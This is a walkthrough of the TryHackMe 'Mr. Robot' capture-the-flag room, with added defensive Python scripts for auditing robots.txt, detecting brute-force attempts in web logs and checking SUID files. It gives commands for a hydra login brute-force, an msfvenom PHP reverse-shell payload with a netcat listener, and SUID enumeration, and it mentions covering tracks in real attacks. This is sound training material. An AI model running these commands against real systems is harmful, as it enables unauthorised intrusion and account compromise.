# Mr. Robot Walkthrough
The Mr. Robot room on TryHackMe is a popular Capture the Flag (CTF) challenge based on the TV show Mr. Robot. The challenge is designed to test a variety of skills including enumeration, web exploitation, and privilege escalation. Here’s a step-by-step guide to get you started from scratch:
### 1. Setting Up Your Environment
Before diving into the challenge, ensure you have a suitable environment set up:
#### Virtual Machine (VM):
It’s recommended to use a Kali Linux VM for this challenge since it comes pre-installed with many tools you'll need.
#### VPN Connection:
You’ll need to connect to the TryHackMe network via OpenVPN. Download the configuration file from TryHackMe and connect using:
```
sudo openvpn yourfile.ovpn
```
### 2. Starting the Machine
On TryHackMe, start the Mr. Robot machine. This will provide you with an IP address that you’ll be working with.
### 3. Initial Enumeration
Ping the Machine:
```
ping -c5 <target-ip>
```
This checks if the machine is up and reachable.
Nmap Scan: The first step is to enumerate open ports and services.
```bash
nmap -sC -sV -oN nmap_scan.txt <target-ip>
```
- `-sC` runs the default NSE scripts.
- `-sV` probes open ports to determine service and version information.
- `-oN` saves the output to a file in nmap's normal format.
### 4. Web Enumeration
Given the theme, the most likely vector is a web-based attack:
Check the Web Server: Open a browser and navigate to `http://<target-ip>`.
Explore the website; the content might provide clues.
Directory Brute-forcing: Use a tool like gobuster to find hidden directories or files.
```
gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt
```
This could reveal hidden files or directories, such as `/robots.txt`, which often contains clues.
### 5. Analyzing Discovered Files
`robots.txt`: If found, it might contain directories that lead to interesting content. For example:
```
User-agent: *
Disallow: /fsocity.dic
Disallow: /key-1-of-3.txt
```
#### Downloading Files:
If you find a dictionary file like fsocity.dic, download it. It might be useful for brute-forcing login credentials.
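The `robots.txt` entries above are a good illustration of why that file is a clue at all: it is public, so a `Disallow` line that names a specific file advertises the file rather than hiding it. The following parser, added here as an example (it is not part of the TryHackMe room or of any tool the walkthrough mentions), parses a `robots.txt` body into User-agent groups and flags `Disallow` entries that point at individual files with tell-tale extensions. The sample body is constructed from the two entries shown above plus a `wp-admin` pair to exercise `Allow` handling; the extension list and function names are assumptions made for illustration.

```python
"""Parse a robots.txt body and flag Disallow entries that expose single files.

Added example for this walkthrough, not part of the TryHackMe room or any
project's code. SAMPLE_ROBOTS is constructed; SENSITIVE_EXTENSIONS is an
illustrative assumption, not an exhaustive list.
"""
import re
from dataclasses import dataclass, field

SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /fsocity.dic
Disallow: /key-1-of-3.txt
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
"""

# Extensions that, when a Disallow names them, usually mean a document is
# being "hidden" rather than a crawl path being excluded (assumed list).
SENSITIVE_EXTENSIONS = {".dic", ".txt", ".bak", ".sql", ".zip", ".log", ".env"}


@dataclass
class RobotsGroup:
    agents: list = field(default_factory=list)
    disallow: list = field(default_factory=list)
    allow: list = field(default_factory=list)


def parse_robots(text: str) -> list:
    """Return the User-agent groups found in a robots.txt body.

    Follows the common grammar: one or more User-agent lines followed by
    Allow/Disallow rules; '#' starts a comment; blank lines are ignored.
    """
    groups, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            # A User-agent line that follows rules starts a new group;
            # consecutive User-agent lines share one group.
            if current is None or current.disallow or current.allow:
                current = RobotsGroup()
                groups.append(current)
            current.agents.append(value)
        elif current is not None and key == "disallow" and value:
            current.disallow.append(value)
        elif current is not None and key == "allow" and value:
            current.allow.append(value)
    return groups


def exposed_files(text: str) -> list:
    """List Disallow paths that name a single file with a sensitive extension.

    Such an entry does not protect the file; the fix is to remove the file
    or put it behind access control, not to rely on robots.txt.
    """
    findings = []
    for group in parse_robots(text):
        for path in group.disallow:
            ext = re.search(r"(\.[A-Za-z0-9]+)$", path)
            if not path.endswith("/") and ext and ext.group(1).lower() in SENSITIVE_EXTENSIONS:
                findings.append(path)
    return findings


if __name__ == "__main__":
    for g in parse_robots(SAMPLE_ROBOTS):
        print("agents:", g.agents, "disallow:", g.disallow, "allow:", g.allow)
    print("exposed files:", exposed_files(SAMPLE_ROBOTS))
```

Run against the sample, the audit reports `/fsocity.dic` and `/key-1-of-3.txt` as exposed files while ignoring the `/wp-admin/` directory rule, which is the distinction a site owner reviewing their own `robots.txt` needs to make.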
### 6. Brute Forcing Login (If Applicable)
WordPress Login: If you find a WordPress login page, try brute-forcing it with the dictionary file. The command below is a sketch: hydra's form module also needs the form's field names and a string that identifies a failed login, and `hydra -U http-post-form` prints the syntax it expects.
```
hydra -l <username> -P fsocity.dic <target-ip> http-form-post '/wp-login.php'
```
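Both the gobuster step in section 4 and the hydra step above leave an obvious trace in the web server's access log: a burst of 404s from one source, or a burst of `POST /wp-login.php` requests from one source. The detector below is an added example for this walkthrough (not part of the TryHackMe room or of any tool mentioned here) showing how a defender would spot either pattern. The log lines are constructed in Apache combined-log format, and the window size, thresholds and function names are assumptions chosen for illustration; real thresholds are tuned to the site's normal traffic.

```python
"""Detect directory brute-forcing and login brute-forcing in web access logs.

Added example for this walkthrough; not part of the TryHackMe room or any
project's code. Sample log lines are constructed (Apache combined format);
WINDOW, thresholds and function names are illustrative assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

WINDOW = timedelta(seconds=60)
NOT_FOUND_THRESHOLD = 20   # 404s per source per window: directory scan
LOGIN_THRESHOLD = 10       # POST /wp-login.php per source per window: password guessing


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def max_in_window(times: list, window: timedelta) -> int:
    """Largest number of events whose timestamps fall within any single window."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(lines) -> dict:
    """Map each suspicious source IP to the set of behaviours it triggered."""
    not_found = defaultdict(list)
    logins = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, status = parsed
        if status == 404:
            not_found[ip].append(ts)
        if method == "POST" and path.split("?")[0] == "/wp-login.php":
            logins[ip].append(ts)
    alerts = defaultdict(set)
    for ip, ts_list in not_found.items():
        if max_in_window(ts_list, WINDOW) >= NOT_FOUND_THRESHOLD:
            alerts[ip].add("directory-bruteforce")
    for ip, ts_list in logins.items():
        if max_in_window(ts_list, WINDOW) >= LOGIN_THRESHOLD:
            alerts[ip].add("login-bruteforce")
    return dict(alerts)


def _line(ip: str, second: int, method: str, path: str, status: int) -> str:
    """Build one constructed combined-format log line inside a single minute."""
    return f'{ip} - - [01/Jan/2024:12:00:{second:02d} +0000] "{method} {path} HTTP/1.1" {status} 512'


def sample_log() -> list:
    """Constructed log: one directory scanner, one password guesser, one normal visitor."""
    lines = [_line("10.0.0.5", i, "GET", f"/dir{i}", 404) for i in range(25)]
    lines += [_line("10.0.0.9", i, "POST", "/wp-login.php", 200) for i in range(12)]
    lines += [_line("10.0.0.2", 5, "GET", "/", 200),
              _line("10.0.0.2", 6, "GET", "/favicon.ico", 404),
              _line("10.0.0.2", 30, "GET", "/wp-login.php", 200)]
    return lines


if __name__ == "__main__":
    for ip, kinds in sorted(detect(sample_log()).items()):
        print(ip, sorted(kinds))
```

The sliding window matters more than the raw counts: a site with many stale links accumulates 404s all day, but it does not accumulate twenty of them from one address inside a minute. Login detection keys on the request shape rather than the status code because WordPress answers a failed login with HTTP 200.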
### 7. Exploiting Vulnerabilities
If you gain access via a web application:
Reverse Shell: If you find a vulnerable file upload or command injection, use it to gain a reverse shell. This might involve generating a payload with msfvenom or using a ready-made PHP reverse shell.
```
msfvenom -p php/reverse_php LHOST=<your-ip> LPORT=4444 -f raw > shell.php
```
Set up a listener on your machine:
```bash
nc -lvnp 4444
```
### 8. Privilege Escalation
After gaining initial access, the goal is to escalate privileges to root:
Enumerate the System: Check for SUID binaries, cron jobs, or weak sudo permissions.
```
find / -perm -u=s -type f 2>/dev/null
sudo -l
```
Exploit Vulnerabilities: If you find a vulnerable SUID binary or a cron job running as root, exploit it to escalate privileges.
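The `find / -perm -u=s` search above is the same check a defender runs, except that a defender compares the result against a known-good baseline so that an unexpected set-uid file stands out. The script below is an added example for this walkthrough (not part of the TryHackMe room or any project's code): it classifies `(path, mode)` pairs into set-uid files missing from the baseline, set-gid files, and baseline binaries that have lost their bit. The baseline list and the constructed file table are illustrative assumptions; a real baseline comes from a clean image of the same host.

```python
"""Audit set-uid and set-gid files against a baseline allow-list.

Added example for this walkthrough; not part of the TryHackMe room or any
project's code. BASELINE_SUID and sample_entries() are constructed,
illustrative assumptions.
"""
import os
import stat

# Assumed baseline: setuid binaries a stock Debian-style install commonly ships.
BASELINE_SUID = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/su",
    "/usr/bin/mount",
    "/usr/bin/umount",
    "/usr/bin/chsh",
    "/usr/bin/newgrp",
}


def is_setuid(mode: int) -> bool:
    return bool(mode & stat.S_ISUID)


def is_setgid(mode: int) -> bool:
    return bool(mode & stat.S_ISGID)


def audit(entries, baseline=BASELINE_SUID) -> dict:
    """Classify (path, mode) pairs; non-regular files are skipped.

    unexpected_suid: setuid files not in the baseline (possible planted binary)
    unexpected_sgid: setgid files, reported for review
    missing: baseline binaries that no longer carry the setuid bit
    """
    seen_suid = set()
    result = {"unexpected_suid": [], "unexpected_sgid": [], "missing": []}
    for path, mode in entries:
        if not stat.S_ISREG(mode):
            continue
        if is_setuid(mode):
            seen_suid.add(path)
            if path not in baseline:
                result["unexpected_suid"].append(path)
        elif is_setgid(mode):
            result["unexpected_sgid"].append(path)
    result["missing"] = sorted(baseline - seen_suid)
    result["unexpected_suid"].sort()
    result["unexpected_sgid"].sort()
    return result


def walk_filesystem(root="/"):
    """Yield (path, mode) for every file under root, like `find / -type f`."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


def sample_entries() -> list:
    """Constructed file table: a normal system plus one rogue setuid shell copy."""
    reg = stat.S_IFREG
    return [
        ("/usr/bin/passwd", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/sudo", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/su", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/mount", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/umount", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/chsh", reg | stat.S_ISUID | 0o755),
        ("/usr/bin/newgrp", reg | 0o755),                   # setuid bit removed
        ("/usr/bin/wall", reg | stat.S_ISGID | 0o755),
        ("/tmp/.hidden/sh", reg | stat.S_ISUID | 0o755),    # rogue setuid copy
        ("/etc/passwd", reg | 0o644),
        ("/usr/bin", stat.S_IFDIR | 0o755),                 # directory, skipped
    ]


if __name__ == "__main__":
    import sys
    entries = walk_filesystem(sys.argv[1]) if len(sys.argv) > 1 else sample_entries()
    for key, paths in audit(entries).items():
        print(f"{key}: {paths}")
```

Run with no arguments it audits the constructed table; run with a directory argument it walks the real filesystem, which is how you would turn the one-off `find` into a repeatable check. Reporting baseline binaries that have lost their bit is deliberate: a missing `setuid` on `sudo` breaks administration just as surely as an extra one on a shell breaks security.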
### 9. Capture the Flags
The final goal is to find and capture the flags:
User Flag: This is typically found in the home directory of the user you gain access to.
Root Flag: Found in the /root directory after gaining root access.
### 10. Post-Exploit: Clean Up
If this were a real-world scenario, you would clean up your traces. In a CTF, it's good practice to document what you’ve done and share insights with others.
### Tools Summary:
- Nmap: For port scanning and service enumeration.
- Gobuster: For directory brute-forcing.
- Hydra: For brute-forcing logins.
- Netcat (nc): For the reverse shell listener.
- Msfvenom: For payload generation.
- LinPEAS: A script for post-exploitation enumeration (Linux Privilege Escalation Awesome Script).
### Tips:
Take Notes: Document every step you take. This will help you understand what you've done and make it easier to retrace steps if needed.
Google Everything: If you're stuck, don't hesitate to Google specific errors, commands, or techniques. The CTF community is vast, and someone has likely encountered your issue before.
Feel free to ask if you need clarification on any specific steps!